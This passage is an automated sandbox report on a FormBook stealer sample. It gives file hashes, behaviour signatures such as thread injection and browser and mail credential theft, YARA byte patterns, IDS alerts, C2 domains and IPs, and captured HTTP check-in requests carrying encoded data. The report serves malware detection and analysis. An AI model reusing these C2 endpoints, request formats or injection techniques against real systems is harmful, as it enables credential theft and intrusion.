Windows Analysis Report
r3T-ENQ-O-2024-10856.exe

Overview

General Information

Sample name: r3T-ENQ-O-2024-10856.exe
Analysis ID: 1510735
MD5: 52ef22af5530fe6362d8638583866c7f
SHA1: bf344e2b57cf1faea3c523212fa0aee1a99a3a6a
SHA256: 122c7d2d307d52030eb2021410912b9cf3af46ee3f25a9fd8869f22a8a0baff9
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • r3T-ENQ-O-2024-10856.exe (PID: 3228 cmdline: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe" MD5: 52EF22AF5530FE6362D8638583866C7F)
    • svchost.exe (PID: 6408 cmdline: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • rYmePGTGlPk.exe (PID: 3452 cmdline: "C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 6604 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • rYmePGTGlPk.exe (PID: 2136 cmdline: "C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5624 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.svchost.exe.380000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.380000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f1e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.380000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.380000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e3e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", CommandLine: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", ParentImage: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, ParentProcessId: 3228, ParentProcessName: r3T-ENQ-O-2024-10856.exe, ProcessCommandLine: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", ProcessId: 6408, ProcessName: svchost.exe
            Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", CommandLine: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", ParentImage: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe, ParentProcessId: 3228, ParentProcessName: r3T-ENQ-O-2024-10856.exe, ProcessCommandLine: "C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe", ProcessId: 6408, ProcessName: svchost.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-13T12:03:17.133067+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49464 | 3.33.130.190 | 80 | TCP
            2024-09-13T12:03:41.188431+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49469 | 13.228.81.39 | 80 | TCP
            2024-09-13T12:04:08.333594+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 61308 | 66.81.203.10 | 80 | TCP

            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-13T12:03:33.505785+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49466 | 13.228.81.39 | 80 | TCP
            2024-09-13T12:03:36.168673+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49467 | 13.228.81.39 | 80 | TCP
            2024-09-13T12:03:38.651818+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49468 | 13.228.81.39 | 80 | TCP
            2024-09-13T12:04:05.753743+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 61307 | 66.81.203.10 | 80 | TCP
            2024-09-13T12:04:14.765281+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 61309 | 103.42.108.46 | 80 | TCP

            AV Detection

            Source: r3T-ENQ-O-2024-10856.exe; ReversingLabs: Detection: 26%
            Source: Yara match; File source: 2.2.svchost.exe.380000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 2.2.svchost.exe.380000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3345963921.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3347470009.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3347537099.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.3347309941.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
            Source: r3T-ENQ-O-2024-10856.exe; Joe Sandbox ML: detected
            Source: r3T-ENQ-O-2024-10856.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rYmePGTGlPk.exe, 00000005.00000002.3345960481.00000000001CE000.00000002.00000001.01000000.00000005.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3345962314.00000000001CE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087938778.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087779315.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2583856799.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483464557.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2485346788.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2583856799.0000000000CAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3347694542.0000000003900000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3347694542.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2586450627.0000000003756000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2583695906.00000000035AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087938778.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, r3T-ENQ-O-2024-10856.exe, 00000000.00000003.2087779315.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2583856799.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483464557.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2485346788.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2583856799.0000000000CAE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.3347694542.0000000003900000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3347694542.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2586450627.0000000003756000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2583695906.00000000035AC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2583741674.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547599411.000000000081A000.00000004.00000020.00020000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3346863401.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2583741674.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547599411.000000000081A000.00000004.00000020.00020000.00000000.sdmp, rYmePGTGlPk.exe, 00000005.00000002.3346863401.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_0009DD92 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0009DD92
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_000D2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_000D2044
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_000D219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_000D219F
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_000D24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_000D24A9
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_000C6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_000C6B3F
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_000C6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_000C6E4A
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_000CF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_000CF350
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_000CFD47 FindFirstFileW,FindClose, 0_2_000CFD47
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_000CFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_000CFDD2
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 6_2_0321C0D0 FindFirstFileW,FindNextFileW,FindClose, 6_2_0321C0D0
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4x nop then xor eax, eax 6_2_03209B60
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4x nop then mov ebx, 00000004h 6_2_038104DF

            Networking

            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49468 -> 13.228.81.39:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49464 -> 3.33.130.190:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49466 -> 13.228.81.39:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49467 -> 13.228.81.39:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49469 -> 13.228.81.39:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:61309 -> 103.42.108.46:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:61307 -> 66.81.203.10:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:61308 -> 66.81.203.10:80
            Source: Joe Sandbox View; IP Address: 13.228.81.39
            Source: Joe Sandbox View; IP Address: 103.42.108.46
            Source: Joe Sandbox View; ASN Name: CONFLUENCE-NETWORK-INCVG
            Source: Joe Sandbox View; ASN Name: AMAZON-02US
            Source: Joe Sandbox View; ASN Name: SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_000D550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_000D550C
            Source: global traffic; HTTP traffic detected:
                GET /gqyt/?GHSh-Tth=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&1Hqh=_NtDd HTTP/1.1
                Host: www.chamadaslotgiris.net
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&1Hqh=_NtDd HTTP/1.1
                Host: www.masteriocp.online
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /osde/?GHSh-Tth=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&1Hqh=_NtDd HTTP/1.1
                Host: www.mediaplug.biz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global traffic; DNS traffic detected: DNS query: www.linkbasic.net
            Source: global traffic; DNS traffic detected: DNS query: www.chamadaslotgiris.net
            Source: global traffic; DNS traffic detected: DNS query: www.masteriocp.online
            Source: global traffic; DNS traffic detected: DNS query: www.mediaplug.biz
            Source: global traffic; DNS traffic detected: DNS query: www.independent200.org
            Source: unknown; HTTP traffic detected:
                POST /p5rq/ HTTP/1.1
                Host: www.masteriocp.online
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US
                Connection: close
                Content-Length: 209
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Origin: http://www.masteriocp.online
                Referer: http://www.masteriocp.online/p5rq/
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                Data Raw: 47 48 53 68 2d 54 74 68 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 75 51 5a 6f 6c 4e 77 4c 4f 61 2b 75 72 43 7a 4f 38 6a 70 65 37 6a 78 78 30 69 34 66 6e 75 43 53 76 56 73 75 48 56 49 3d
                Data Ascii: GHSh-Tth=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uQZolNwLOa+urCzO8jpe7jxx0i4fnuCSvVsuHVI=
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 403 Forbidden
                Content-Type: text/plain; charset=utf-8
                Date: Fri, 13 Sep 2024 10:04:14 GMT
                Content-Length: 11
                Connection: close
                Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                Data Ascii: Bad Request
            Source: rYmePGTGlPk.exe, 00000007.00000002.3347309941.0000000002A81000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.independent200.org
            Source: rYmePGTGlPk.exe, 00000007.00000002.3347309941.0000000002A81000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.independent200.org/yl6y/
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000006.00000002.3346397218.00000000033BF000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000006.00000002.3346397218.00000000033BF000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000006.00000002.3346397218.00000000033BF000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000006.00000002.3346397218.00000000033BF000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033_w
            Source: netbtugc.exe, 00000006.00000002.3346397218.00000000033BF000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000006.00000002.3346397218.00000000033BF000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000006.00000003.2828593534.00000000081FB000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000006.00000002.3348221729.0000000004638000.00000004.10000000.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3347857669.0000000003608000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://www.masteriocp.online/p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_000D7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_000D7099
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_000D7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_000D7294
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_000D7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_000D7099
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_000C4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 0_2_000C4342
            Source: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe; Code function: 0_2_000EF5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_000EF5D0

            E-Banking Fraud

